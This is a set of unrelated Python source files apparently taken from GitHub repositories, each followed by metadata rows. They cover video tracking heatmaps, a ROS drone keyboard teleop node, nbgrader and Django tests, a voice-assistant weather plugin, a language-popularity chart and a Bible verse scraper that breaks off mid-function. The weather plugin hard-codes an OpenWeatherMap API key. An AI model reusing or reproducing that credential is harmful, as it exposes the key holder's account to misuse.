    :return: None
    """
    data = data[data['object_name'].isin(key)]
    res = (1920, 1080) if kwargs.get('resolution') is None else kwargs.get('resolution')
    # reassign instead of inplace-filling the filtered slice, which triggers
    # pandas' chained-assignment warning
    data = data.fillna(0)
    img = np.zeros((res[1], res[0], 4), dtype=np.uint)
    # accumulate how many boxes cover each pixel in the RGB channels
    for _, row in data.iterrows():
        left, top, right, bottom = ensure_coords(row['left'], row['top'], row['right'], row['bottom'])
        img[int(top * res[1]):int(bottom * res[1]), int(left * res[0]):int(right * res[0]), 0:3] += 1
    # normalise to [0, 1]; NOTE(review): divides by zero if no box was drawn
    img = img / img.max()
    img[0:res[1], 0:res[0], 3] = 1
    # 'scipy.ndimage.filters' was deprecated in SciPy 1.10 and removed in
    # 1.12 — import from scipy.ndimage instead
    from scipy.ndimage import gaussian_filter
    img = gaussian_filter(img, sigma=5)
    from matplotlib.colors import LinearSegmentedColormap
    cmap = LinearSegmentedColormap.from_list("", ["blue", "red"])
    video_id, object_name = data['id'].iat[0], data['object_name'].iat[0]
    out_path = out_dir / f"{video_id}_{object_name}.png"
    plt.imshow(img, cmap=cmap)
    plt.imsave(uniquify(out_path.as_posix()), img, cmap=cmap)
def berensham(x1, y1, x2, y2):
    """
    Yield the integer points of the line from (x1, y1) to (x2, y2).

    Implementation of Bresenham's line algorithm; both endpoints are
    included in the generated sequence.
    """
    delta_x, delta_y = abs(x2 - x1), abs(y2 - y1)
    step_x = 1 if x1 < x2 else -1
    step_y = 1 if y1 < y2 else -1
    error = delta_x - delta_y
    x, y = x1, y1
    while True:
        yield x, y
        if (x, y) == (x2, y2):
            return
        doubled = error * 2
        if doubled > -delta_y:
            error -= delta_y
            x += step_x
        if doubled < delta_x:
            error += delta_x
            y += step_y
def render_traces(out_dir: Path, data: pd.DataFrame, key: list, **kwargs) -> None:
    """
    Render the movement traces (centroid paths) of the selected objects.

    :param out_dir: folder where to save the rendered image
    :param data: DataFrame with object tracking rows; needs 'object_id',
        'object_name', 'time_seconds', 'left', 'top', 'right', 'bottom', 'id'
    :param key: list of object names whose traces are drawn
    :keyword resolution: tuple(width, height), defaults to (1920, 1080)
    :return: None
    """
    print(list(data))
    data = data[data['object_name'].isin(key)]
    res = (1920, 1080) if kwargs.get('resolution') is None else kwargs.get('resolution')
    # NOTE(review): inplace fillna on a filtered slice can trigger pandas'
    # chained-assignment warning
    data.fillna(0, inplace=True)
    img = np.zeros((res[1], res[0], 4), dtype=np.uint)
    # we need to cluster data by object_id in order to follow the same object throughout the video
    data = data.groupby('object_id').apply(lambda x: x.sort_values('time_seconds'))
    # since centroid positions are not guaranteed to be continuous, we draw a line
    # from point 'n' to point 'n+1' using Bresenham's line algorithm
    for _, group in data.groupby('object_id'):
        for i in range(len(group)-1):
            left, top, right, bottom = ensure_coords(group['left'].iloc[i], group['top'].iloc[i], group['right'].iloc[i], group['bottom'].iloc[i])
            centroid = (int((left + right) / 2 * res[0]), int((top + bottom) / 2 * res[1]))
            n_left, n_top, n_right, n_bottom = ensure_coords(group['left'].iloc[i+1], group['top'].iloc[i+1], group['right'].iloc[i+1], group['bottom'].iloc[i+1])
            next_centroid = (int((n_left + n_right) / 2 * res[0]), int((n_top + n_bottom) / 2 * res[1]))
            # paint a thick stroke along the line between the two centroids.
            # NOTE(review): the slice is 10px tall ((y-5):(y+5)) but only 5px
            # wide ((x-5):(x)) — probably meant to be symmetric; confirm.
            # Near the left/top border the negative start index makes the
            # slice empty, so those strokes are silently skipped.
            for x, y in berensham(centroid[0], centroid[1], next_centroid[0], next_centroid[1]):
                img[(y-5):(y+5), (x-5):(x), 0:3] += 1
    # normalise to [0, 1] and force the alpha channel to fully opaque
    img = img / img.max()
    img[0:res[1], 0:res[0], 3] = 1
    video_id, object_name = data['id'].iat[0], data['object_name'].iat[0]
    out_path = out_dir / f"{video_id}_{object_name}.png"
    plt.imsave(uniquify(out_path.as_posix()), img)
    print(f"Rendered trace for {video_id} {object_name}")
    return None
def extract_object_thumbnails(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
    """
    Extract thumbnails of the selected objects from a video, using the
    object tracking annotations in ``data``.

    :param key: names of the objects to extract
    :param in_dir: directory where the source video is stored
    :param out_dir: directory where to save the thumbnails
    :param data: dataframe with object tracking annotations
    :rtype: None
    """
    selection = interpolate_missing_data(data[data['object_name'].isin(key)])
    extract_object_thumbs(in_dir, out_dir, selection)
    return None
def extract_object_gifs(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
    """
    Extract animated GIFs of the selected objects from a video, using the
    object tracking annotations in ``data``.

    :param key: names of the objects to extract
    :param in_dir: directory where the source video is stored
    :param out_dir: directory where to save the GIFs
    :param data: dataframe with object tracking annotations
    :rtype: None
    """
    selection = interpolate_missing_data(data[data['object_name'].isin(key)])
    extract_obj_gifs_parallel(in_dir, out_dir, selection)
    return None
def extract_masked_clips(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
    """
    Extract masked clips of the selected objects from a video, using the
    object tracking annotations in ``data``.

    :param key: names of the objects to extract
    :param in_dir: directory where the source video is stored
    :param out_dir: directory where to save the clips
    :param data: dataframe with object tracking annotations
    :return: None
    """
    selection = interpolate_missing_data(data[data['object_name'].isin(key)])
    extract_masked_object_clips(in_dir, out_dir, selection)
def extract_object_metavideo(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
    """
    Build a 'metavideo' of the selected objects: masked clips are rendered
    on a green background into a scratch directory, then composited
    together with chroma-keying.

    :param key: names of the objects to extract
    :param in_dir: directory where the source video is stored
    :param out_dir: directory where to save the result
    :param data: dataframe with object tracking annotations
    :return: None
    """
    data = data[data['object_name'].isin(key)]
    data = interpolate_missing_data(data)
    # context manager guarantees the scratch directory is removed when done
    # (the bare TemporaryDirectory object relied on GC finalisation)
    with tempfile.TemporaryDirectory() as temp_dir:
        extract_masked_object_clips(in_dir, Path(temp_dir), data, color=(0, 255, 0, 0))
        merge_with_chromakey(Path(temp_dir), out_dir)
def extract_object_metagrid(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
    """
    Build a 'metagrid' of the selected objects: thumbnails are extracted
    into a scratch directory and then composed into a grid image/video.

    :param key: names of the objects to extract
    :param in_dir: directory where the source video is stored
    :param out_dir: directory where to save the result
    :param data: dataframe with object tracking annotations
    :return: None
    """
    data = data[data['object_name'].isin(key)]
    data = interpolate_missing_data(data)
    # context manager guarantees the scratch directory is removed when done
    # (the bare TemporaryDirectory object relied on GC finalisation)
    with tempfile.TemporaryDirectory() as temp_dir:
        extract_object_thumbs(in_dir, Path(temp_dir), data)
        get_metagrid(Path(temp_dir), out_dir)
| lucadra/mismas | output.py | output.py | py | 20,425 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "pandas.DataFrame",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "typing.List",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "pandas.concat",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
... |
29551740207 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import curses
import math
import rospy
import sys
import dynamic_reconfigure.server
from std_msgs.msg import String
from std_msgs.msg import Empty
from geometry_msgs.msg import Twist
from demo_teleop.cfg import SafeDroneTeleopConfig
class Status:
    """
    Drone flight state machine.

    States: "landed", "taking off", "manual flight", "automatic flight",
    "landing". Publishes takeoff/land/reset commands and relays velocity
    commands, switching from keyboard control back to the external
    'cmd_vel_in' topic after a period of keyboard inactivity.
    """
    def __init__(self):
        self.status = "landed" # "landing" "taking off" "automatic flight" "manual flight"
        self.last_time = rospy.Time()   # time of the last state change / key press
        self.last_input = rospy.Time()  # time of the last twist received on cmd_vel_in
        self.twist = Twist()            # twist built from keyboard input
        self.in_twist = Twist()         # twist received from cmd_vel_in
        self.state_wait = 3.0 # transition between states (taking_off, landing, etc..)
        self.watchdog_time = .25 # input crash security delay (no input twist => stop)
        self.linear = 0.1 # initial value
        self.angular = 0.5 # initial value
        self.delay = 2.0 # initial value
        self.status_pub = rospy.Publisher ('status', String, queue_size=1)
        self.r_pub = rospy.Publisher ('reset', Empty, queue_size=1)
        self.t_pub = rospy.Publisher ('takeoff', Empty, queue_size=1)
        self.l_pub = rospy.Publisher ('land', Empty, queue_size=1)
        self.twist_pub = rospy.Publisher ('cmd_vel_out', Twist, queue_size=1)
        self.twist_sub = rospy.Subscriber('cmd_vel_in', Twist, self.on_twist, queue_size = 1)
        self.config_srv = dynamic_reconfigure.server.Server(SafeDroneTeleopConfig, self.on_reconf)
    def on_reconf(self, config, level):
        """dynamic_reconfigure callback: update the speed/delay parameters."""
        self.angular = config['angular']
        self.linear = config['linear']
        self.delay = config['delay']
        return config
    def on_twist(self, ros_data):
        """Store the latest external twist and timestamp it for the watchdog."""
        self.in_twist = ros_data
        self.last_input = rospy.Time.now()
    def send_twist(self):
        """Publish the twist matching the current state (keyboard or external)."""
        if self.status == "manual flight":
            self.twist_pub.publish(self.twist)
        elif self.status == "automatic flight":
            time = rospy.Time.now()
            # watchdog: if the external source went silent, publish a zero twist
            if(time - self.last_input).to_sec() > self.watchdog_time :
                self.in_twist = Twist()
            self.twist_pub.publish(self.in_twist)
    def take_off(self):
        """Reset the drone and trigger take-off (only allowed when landed)."""
        if self.status == "landed" :
            self.twist = Twist()
            self.status = "taking off"
            self.status_pub.publish(self.status)
            self.r_pub.publish(Empty())
            rospy.sleep(1.)
            self.t_pub.publish(Empty())
            self.last_time = rospy.Time.now()
    def land(self):
        """Trigger landing and zero the keyboard twist."""
        self.last_time = rospy.Time.now()
        self.twist = Twist()
        self.status = "landing"
        self.l_pub.publish(Empty())
    def nop(self):
        """No key pressed: advance timed state transitions, then publish
        the current status and twist."""
        if self.status == "manual flight" :
            time = rospy.Time.now()
            # no key press for 'delay' seconds -> hand control back to cmd_vel_in
            if (time - self.last_time).to_sec() > self.delay :
                self.status = "automatic flight"
        elif self.status == "taking off":
            time = rospy.Time.now()
            if (time - self.last_time).to_sec() > self.state_wait :
                self.status = "manual flight"
                self.last_time = time
                self.twist = Twist()
        elif self.status == "landing":
            time = rospy.Time.now()
            if (time - self.last_time).to_sec() > self.state_wait :
                self.status = "landed"
        self.status_pub.publish(self.status)
        self.send_twist()
    def key_pressed(self):
        """Any key press: take manual control and publish the twist."""
        self.last_time = rospy.Time.now()
        if self.status != "manual flight":
            self.twist = Twist()
            if self.status == "automatic flight" :
                self.status = "manual flight"
        self.send_twist()
def main(stdscr):
    """
    Curses UI loop driving the Status state machine from the keyboard.

    The x/y/z/a 'level' variables hold the commanded direction on each axis
    (-1, 0 or 1); a direction key steps the level towards its direction, so
    pressing the opposite key first brings the axis back to a stop.

    :param stdscr: curses screen provided by curses.wrapper
    """
    xlevel = 0
    ylevel = 0
    zlevel = 0
    alevel = 0
    rospy.init_node('safe_drone_teleop', anonymous=True)
    # NOTE(review): log_pub and rate are created but never used below
    log_pub = rospy.Publisher ('log', String, queue_size=1)
    rate = rospy.Rate(10)
    keycode = -1
    status = Status()
    stdscr.addstr("Safe drone controller\n")
    stdscr.addstr("---------------------\n")
    stdscr.addstr("\n")
    stdscr.addstr("Command\n")
    stdscr.addstr(" - UP/DOWN : control linear x\n")
    stdscr.addstr(" - LEFT/RIGHT : control linear y\n")
    stdscr.addstr(" - e/r : control angular z\n")
    stdscr.addstr(" - t/l : take off / land\n")
    stdscr.addstr(" - PAGE UP/DOWN : elevation control\n")
    stdscr.addstr(" - any key : reset of the twist\n")
    # We set the "wait for a key press" period to 100 ms.
    stdscr.timeout(100)
    while (not rospy.is_shutdown()):
        keycode = stdscr.getch() # Wait for a key press for at most 100ms
        if keycode == -1 :
            status.nop() # No key has been pressed, we keep current twist.
        elif keycode == curses.KEY_UP :
            # forward: step x towards +1 (stop first if currently moving back)
            status.key_pressed()
            if xlevel == -1 :
                status.twist.linear.x = 0
                xlevel = 0
            elif xlevel == 0:
                status.twist.linear.x = status.linear
                xlevel = 1
        elif keycode == curses.KEY_DOWN :
            # backward: step x towards -1
            status.key_pressed()
            if xlevel == 0 :
                status.twist.linear.x = -status.linear
                xlevel = -1
            elif xlevel == 1:
                status.twist.linear.x = 0
                xlevel = 0
        elif keycode == curses.KEY_LEFT :
            # left: step y towards +1
            status.key_pressed()
            if ylevel == -1 :
                status.twist.linear.y = 0
                ylevel = 0
            elif ylevel == 0:
                status.twist.linear.y = status.linear
                ylevel = 1
        elif keycode == curses.KEY_RIGHT :
            # right: step y towards -1
            status.key_pressed()
            if ylevel == 0 :
                status.twist.linear.y = -status.linear
                ylevel = -1
            elif ylevel == 1:
                status.twist.linear.y = 0
                ylevel = 0
        elif keycode == curses.KEY_PPAGE :
            # up: step z towards +1
            status.key_pressed()
            if zlevel == -1 :
                status.twist.linear.z = 0
                zlevel = 0
            elif zlevel == 0:
                status.twist.linear.z = status.linear
                zlevel = 1
        elif keycode == curses.KEY_NPAGE :
            # down: step z towards -1
            status.key_pressed()
            if zlevel == 1 :
                status.twist.linear.z = 0
                zlevel = 0
            elif zlevel == 0:
                status.twist.linear.z = -status.linear
                zlevel = -1
        elif keycode == 101 : # e
            # yaw: step angular z towards +1
            status.key_pressed()
            if alevel == -1 :
                status.twist.angular.z = 0
                alevel = 0
            elif alevel == 0:
                status.twist.angular.z = status.angular
                alevel = 1
        elif keycode == 114 : # r
            # yaw: step angular z towards -1
            status.key_pressed()
            if alevel == 0 :
                status.twist.angular.z = -status.angular
                alevel = -1
            elif alevel == 1:
                status.twist.angular.z = 0
                alevel = 0
        elif keycode == 116 : # t
            status.take_off()
            xlevel = 0
            ylevel = 0
            zlevel = 0
            alevel = 0
        elif keycode == 108 : # l
            status.land()
            xlevel = 0
            ylevel = 0
            zlevel = 0
            alevel = 0
        else :
            # any other key: stop all motion
            status.key_pressed()
            status.twist = Twist()
            xlevel = 0
            ylevel = 0
            zlevel = 0
            alevel = 0
        # entering automatic flight resets the keyboard command state
        if status.status == "automatic flight" :
            xlevel = 0
            ylevel = 0
            zlevel = 0
            alevel = 0
            status.twist = Twist()
# Starts curses (terminal handling) and run our main function.
if __name__ == '__main__':
    try:
        # curses.wrapper already passes the screen to main; the extra
        # 'lambda w: main(w)' indirection was redundant
        curses.wrapper(main)
    except rospy.ROSInterruptException:
        pass
| HerveFrezza-Buet/demo-teleop | scripts/safe_drone_teleop.py | safe_drone_teleop.py | py | 7,982 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "rospy.Time",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "rospy.Time",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "geometry_msgs.msg.Twist",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "geometry_msgs.msg.Twist... |
74540351072 | import datetime
import os
import time
import pytest
from os.path import join
from .. import run_nbgrader
from .base import BaseTestApp
from .conftest import notwindows
from ...api import Gradebook
from ...utils import parse_utc, get_username
@notwindows
class TestNbGraderCollect(BaseTestApp):
    """Integration tests for the ``nbgrader collect`` command."""
    def _release_and_fetch(self, assignment, exchange, course_dir):
        """Release ``assignment`` for course abc101 and fetch it as a student."""
        self._copy_file(os.path.join("files", "test.ipynb"), os.path.join(course_dir, "release", "ps1", "p1.ipynb"))
        run_nbgrader([
            "release_assignment", assignment,
            "--course", "abc101",
            "--Exchange.root={}".format(exchange)
        ])
        run_nbgrader([
            "fetch_assignment", assignment,
            "--course", "abc101",
            "--Exchange.root={}".format(exchange)
        ])
    def _submit(self, assignment, exchange, cache, flags=None):
        """Submit the fetched assignment, optionally with extra CLI flags."""
        cmd = [
            "submit", assignment,
            "--course", "abc101",
            "--Exchange.cache={}".format(cache),
            "--Exchange.root={}".format(exchange)
        ]
        if flags is not None:
            cmd.extend(flags)
        run_nbgrader(cmd)
    def _collect(self, assignment, exchange, flags=None, retcode=0):
        """Run ``nbgrader collect`` and return its captured output."""
        cmd = [
            "collect", assignment,
            "--course", "abc101",
            "--Exchange.root={}".format(exchange)
        ]
        if flags is not None:
            cmd.extend(flags)
        return run_nbgrader(cmd, retcode=retcode)
    def _read_timestamp(self, root):
        """Parse the submission timestamp recorded under ``root``."""
        # NOTE(review): 'os.path.os.path.join' resolves (posixpath re-exports
        # os) but is presumably a typo for plain os.path.join
        with open(os.path.os.path.join(root, "timestamp.txt"), "r") as fh:
            timestamp = parse_utc(fh.read())
        return timestamp
    def test_help(self):
        """Does the help display without error?"""
        run_nbgrader(["collect", "--help-all"])
    def test_no_course_id(self, exchange, course_dir, cache):
        """Does collecting without a course id throw an error?"""
        self._release_and_fetch("ps1", exchange, course_dir)
        self._submit("ps1", exchange, cache)
        cmd = [
            "collect", "ps1",
            "--Exchange.root={}".format(exchange)
        ]
        run_nbgrader(cmd, retcode=1)
    def test_collect(self, exchange, course_dir, cache):
        """Collect picks up submissions, and re-collects only with --update."""
        self._release_and_fetch("ps1", exchange, course_dir)
        # try to collect when there"s nothing to collect
        self._collect("ps1", exchange)
        root = os.path.os.path.join(os.path.join(course_dir, "submitted", get_username(), "ps1"))
        assert not os.path.isdir(os.path.join(course_dir, "submitted"))
        # submit something
        self._submit("ps1", exchange, cache)
        time.sleep(1)
        # try to collect it
        self._collect("ps1", exchange)
        assert os.path.isfile(os.path.os.path.join(root, "p1.ipynb"))
        assert os.path.isfile(os.path.os.path.join(root, "timestamp.txt"))
        timestamp = self._read_timestamp(root)
        # try to collect it again
        self._collect("ps1", exchange)
        assert self._read_timestamp(root) == timestamp
        # submit again
        self._submit("ps1", exchange, cache)
        # collect again
        self._collect("ps1", exchange)
        assert self._read_timestamp(root) == timestamp
        # collect again with --update
        self._collect("ps1", exchange, ["--update"])
        assert self._read_timestamp(root) != timestamp
    def test_collect_assignment_flag(self, exchange, course_dir, cache):
        """The assignment can also be given via --assignment=..."""
        self._release_and_fetch("ps1", exchange, course_dir)
        self._submit("ps1", exchange, cache)
        # collect using the flag form instead of the positional argument
        self._collect("--assignment=ps1", exchange)
        root = os.path.os.path.join(os.path.join(course_dir, "submitted", get_username(), "ps1"))
        assert os.path.isfile(os.path.os.path.join(root, "p1.ipynb"))
        assert os.path.isfile(os.path.os.path.join(root, "timestamp.txt"))
    def test_collect_subdirectories(self, exchange, course_dir, cache):
        """Submissions containing subdirectories can be collected."""
        self._release_and_fetch("ps1", exchange, course_dir)
        # create a subdirectory with an empty file
        os.makedirs(os.path.join('ps1', 'foo'))
        with open(os.path.join('ps1', 'foo', 'temp.txt'), 'w') as fh:
            fh.write("")
        self._submit("ps1", exchange, cache)
        # make sure collect succeeds
        self._collect("ps1", exchange)
    def test_owner_check(self, exchange, course_dir, cache):
        """A student id differing from the directory owner is flagged."""
        self._release_and_fetch("ps1", exchange, course_dir)
        self._submit("ps1", exchange, cache, flags=["--student=foobar_student",])
        # By default, a warning is raised if the student id does not match the directory owner
        out = self._collect("--assignment=ps1", exchange)
        assert 'WARNING' in out
        # This warning can be disabled
        out = self._collect("--assignment=ps1", exchange, flags=["--ExchangeCollect.check_owner=False"])
        assert 'WARNING' not in out
    @notwindows
    @pytest.mark.parametrize("groupshared", [False, True])
    def test_permissions(self, exchange, course_dir, cache, groupshared):
        """Collected files and directories get the expected permission bits."""
        if groupshared:
            with open("nbgrader_config.py", "a") as fh:
                fh.write("""c.CourseDirectory.groupshared = True\n""")
        self._release_and_fetch("ps1", exchange, course_dir)
        self._submit("ps1", exchange, cache, flags=["--student=foobar_student",])
        # By default, a warning is raised if the student id does not match the directory owner
        self._collect("--assignment=ps1", exchange)
        assert self._get_permissions(join(exchange, "abc101", "inbound")) == ("2733" if not groupshared else "2773")
        assert self._get_permissions(join(course_dir, "submitted", "foobar_student", "ps1")) == ("777" if not groupshared else "2777")
        assert self._get_permissions(join(course_dir, "submitted", "foobar_student", "ps1", "p1.ipynb")) == ("644" if not groupshared else "664")
    @pytest.mark.parametrize('before_duedate',
                             ['yes', 'no', 'nofirst'])
    def test_collect_before_due_date(self, exchange, course_dir, cache, db, before_duedate):
        """Test --before-duedate flag.
        Test is parameterized so we test both with it and without the flag.
        'yes': test with --before-duedate
        'no': test without
        'nofirst': test with --before-duedate but no assignment before duedate
        """
        # Release assignment
        self._release_and_fetch("ps1", exchange, course_dir)
        # Submit something, wait, submit again. Due date is between.
        if before_duedate != 'nofirst':
            # We don't submit first assignment.
            self._submit("ps1", exchange, cache)
        time.sleep(.05)
        time_duedate = datetime.datetime.utcnow()
        time.sleep(.05)
        self._submit("ps1", exchange, cache)
        # Set the due date
        with Gradebook(db) as gb:
            gb.update_or_create_assignment('ps1', duedate=time_duedate)
        # Collect
        flags = ['--db', db]
        if before_duedate != 'no':
            flags.append('--before-duedate')
        self._collect("ps1", exchange, flags=flags)
        root = os.path.os.path.join(os.path.join(course_dir, "submitted", get_username(), "ps1"))
        timestamp = self._read_timestamp(root)
        # Test both ways: with --before-duedate flag and without
        if before_duedate == 'yes':
            assert timestamp < time_duedate
        else: # 'no', 'nofirst'
            assert timestamp > time_duedate
| jupyter/nbgrader | nbgrader/tests/apps/test_nbgrader_collect.py | test_nbgrader_collect.py | py | 7,521 | python | en | code | 1,232 | github-code | 1 | [
{
"api_name": "base.BaseTestApp",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.os.path.join",
... |
27459770248 | from django.test import TestCase
from django.urls import reverse
from .models import Tarefa
class TarefaTestCase(TestCase):
    """Integration tests for creating and deleting Tarefa objects."""
    def setUp(self):
        # Two pre-existing tasks shared by every test.
        self.tarefa1 = Tarefa.objects.create(titulo='Tarefa 1', texto='Texto da tarefa 1')
        self.tarefa2 = Tarefa.objects.create(titulo='Tarefa 2', texto='Texto da tarefa 2')
    def test_criar_tarefa(self):
        # POST a new task to the creation view.
        payload = {'titulo': 'Nova Tarefa', 'texto': 'Texto da nova tarefa'}
        self.client.post(reverse('criar_tarefa'), payload)
        # The task must now exist in the database.
        self.assertTrue(Tarefa.objects.filter(titulo='Nova Tarefa', texto='Texto da nova tarefa').exists())
        # And it must show up on the task listing page.
        listing = self.client.get(reverse('criar_tarefa'))
        self.assertContains(listing, 'Nova Tarefa')
    def test_excluir_tarefa(self):
        # Task 1 exists before deletion.
        self.assertTrue(Tarefa.objects.filter(id=self.tarefa1.id).exists())
        # POST the deletion request for task 1.
        response = self.client.post(reverse('excluir_tarefa', args=[self.tarefa1.id]))
        # The view redirects back to the creation page.
        self.assertRedirects(response, reverse('criar_tarefa'))
        # Task 1 is gone from the database; task 2 is untouched.
        self.assertFalse(Tarefa.objects.filter(id=self.tarefa1.id).exists())
        self.assertTrue(Tarefa.objects.filter(id=self.tarefa2.id).exists())
| matheudsp/djangoTDD | djangoProject/djangoApp/tests.py | tests.py | py | 1,694 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "django.test.TestCase",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "models.Tarefa.objects.create",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "models.Tarefa.objects",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_nam... |
9628750264 | # -*- coding: utf-8-*-
import re
import requests
import os
from client.plugins.utilities import jasperpath
WORDS = ["WEATHER"]
def findWholeWord(w):
return re.compile(r'\b({0})\b'.format(w), flags=re.IGNORECASE).search
def handle(text, mic, speaker, profile, visionProcess):
"""
Responds to user-input, typically speech text, by relaying the
meaning of life.
Arguments:
text -- user-input, typically transcribed speech
mic -- used to interact with the user (for both input and output)
profile -- contains information related to the user (e.g., phone
number)
"""
#message = "Hold on, checking the weather for you..."
# mic.say(message)
location_name = "Bangalore"
if re.search('(?<=TODAY)(.*)', text):
weather_for = 'today'
elif re.search('(?<=TOMORROW)(.*)', text):
weather_for = 'tomorrow'
elif re.search('(?<=THIS WEEK)(.*)', text):
weather_for = 'this_week'
elif re.search('(?<=NEXT WEEK)(.*)', text):
weather_for = 'next_week'
else:
weather_for = 'today'
if re.search('(?<=IN)(.*)', text, re.IGNORECASE):
print("Found word in.. that means location is specified")
location_temp = re.search("IN (\w+)", text, re.IGNORECASE)
location_name = str(location_temp.group(1))
name_start = ['NEW', 'SAN', 'ABU', 'PORT', 'KUALA', 'LOS']
if location_name.upper() in name_start:
print("Complex city name")
location_temp2 = re.search(location_name + " (\w+)", text)
location_name = location_name + " " + str(location_temp2.group(1))
openWeatherCurrentUrl = 'http://api.openweathermap.org/data/2.5/weather?q=' + \
location_name + '&units=metric&appid=4f95de0f661f4bb718a10067a7f27b60'
openWeatherForeCastUrl = "api.openweathermap.org/data/2.5/forecast?q=" + \
location_name + '&units=metric'
responseObject = requests.get(openWeatherCurrentUrl)
responseData = responseObject.json()
temp_now = responseData['main']['temp']
humidity = responseData['main']['humidity']
description_short = responseData['weather'][0]['main']
"""
sunset = responseData['sys']['sunset']
sunrise = responseData['sys']['sunrise']
temp_max = responseData['main']['temp_max']
temp_min = responseData['main']['temp_min']
temp_now = responseData['main']['temp']
humidity = responseData['main']['humidity']
description_short = responseData['weather'][0]['main']
description_long = responseData['weather'][0]['description']
print temp_max
print temp_min
print temp_now
"""
iconCode = responseData['weather'][0]['icon']
iconURL = 'http://openweathermap.org/img/w/' + iconCode + '.png'
icon_path = jasperpath.WEATHER_ICONS + "/" + iconCode + '.png'
if not os.path.isfile(icon_path):
resp = requests.get(iconURL)
if resp.status_code == 200:
with open(icon_path, 'wb') as f:
for chunk in resp.iter_content(1024):
f.write(chunk)
weather_message = "It is currently " + str(temp_now) + " degrees with " + str(
humidity) + " percent humidity. The weather type is " + description_short
# Need to modify message according to weather_for
visionProcess['image_path'] = icon_path
# visionProcess['message']=weather_message
# visionProcess['message_timeout']=int(5)
speaker.clean_and_say(weather_message)
def isValid(text):
    """
    Returns True if the input asks about the weather.

    Arguments:
    text -- user-input, typically transcribed speech
    """
    patterns = (
        r'\bWhat is the weather',
        r'\bWhat\'s the weather',
        r'\bHow\'s the weather',
        r'\bHow is the weather',
    )
    return any(re.search(pattern, text, re.IGNORECASE) for pattern in patterns)
| shreyashag/ipawac_assistant | ipawac_assistant/assistant-modules/OpenWeather.py | OpenWeather.py | py | 3,987 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "re.compile",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "re.IGNORECASE",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "re.search",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number"... |
34000524076 | import pandas as pd
from collections import Counter
import matplotlib.pyplot as plt
import numpy as np
df = pd.read_csv('survey_results_responses.csv')
# print(df.head())
ids = df['ResponseId']
lang_responses = df['LanguageHaveWorkedWith']
languages_counter = Counter()
for response in lang_responses:
if isinstance(response, str):
languages_counter.update(response.split(';'))
languages = []
popularity = []
for item in languages_counter.most_common(15):
languages.append(item[0])
popularity.append(item[1])
print(languages)
print(popularity)
# plt.bar(languages, popularity)
plt.barh(languages, popularity)
plt.show() | Nahid-Hassan/python-data-visualization | ashik_bhai_phd/lang-popu.py | lang-popu.py | py | 649 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pandas.read_csv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "collections.Counter",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.barh",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "matplotlib.... |
11625575005 | import re
import json
import requests
from tqdm import tqdm
from bs4 import BeautifulSoup
from requests import Session
from concurrent.futures import ThreadPoolExecutor
def main():
extractor = BibleExtractor()
# list of all possible books
book_nums = list(range(1, 67))
# map of books to chapters to verse content
data = []
urls = []
# generate a list of URLs for each chapter
for book_num in tqdm(book_nums, desc="Generating URLs"):
json_data = extractor.get_json_data_for_extra_verse_info(book_num)
num_chapters = extractor.get_num_chapters_in_book(json_data)
for chapter_num in range(1, num_chapters + 1):
url = AppSettings.main_verse_url(book_num, chapter_num)
urls.append(url)
def fetch_and_extract(args):
url, session = args
response = session.get(url)
if response.status_code == 200:
# Extract book_num and chapter_num from the URL
book_num, chapter_num = re.findall(r"/(\d+)/(\d+)", url)[0]
book_num, chapter_num = int(book_num), int(chapter_num)
# Extract verses
chapter_data = {}
json_data = extractor.get_json_data_for_extra_verse_info(book_num)
num_verses = extractor.get_num_verses_in_chapter(chapter_num, json_data)
for verse_num in range(1, num_verses + 1):
if not response.content:
continue
try:
verse = extractor.extract_verse_from_html(book_num, chapter_num, verse_num, response.content)
except AttributeError as e:
print(f"Error extracting verse: {book_num} {chapter_num} {verse_num}")
continue
chapter_data[verse_num] = verse
return book_num, chapter_num, chapter_data
return None
with Session() as session:
# Scrape each URL and map book to chapters to verses content
with ThreadPoolExecutor(max_workers=10) as executor:
args = [(url, session) for url in urls]
for result in tqdm(executor.map(fetch_and_extract, args), total=len(urls), desc="Scraping"):
if result:
book_num, chapter_num, chapter_data = result
data.append({"book": book_num, "chapter": chapter_num, "verses": chapter_data})
with open("verses.json", "w") as f:
json.dump({"data": data}, f)
class BibleExtractor:
    """Helpers for pulling verse text and book/chapter metadata from the
    wol.jw.org study pages and the JW CDN publication-media API."""

    def extract_verse_from_html(self, book_num, chapter_num, verse_num, html_content):
        """Return the cleaned text of one verse from a chapter page's HTML."""
        verse_id = self.construct_verse_id(book_num, chapter_num, verse_num)
        soup = BeautifulSoup(html_content, 'html.parser')
        raw_text = soup.select_one(f"#{verse_id}").text
        # Drop inline verse numbers and footnote markers, then trim whitespace.
        return re.sub(r"[0-9+*]", "", raw_text).strip()

    def get_json_data_for_extra_verse_info(self, book_num):
        """Fetch the CDN media listing for *book_num* (chapter/verse counts)."""
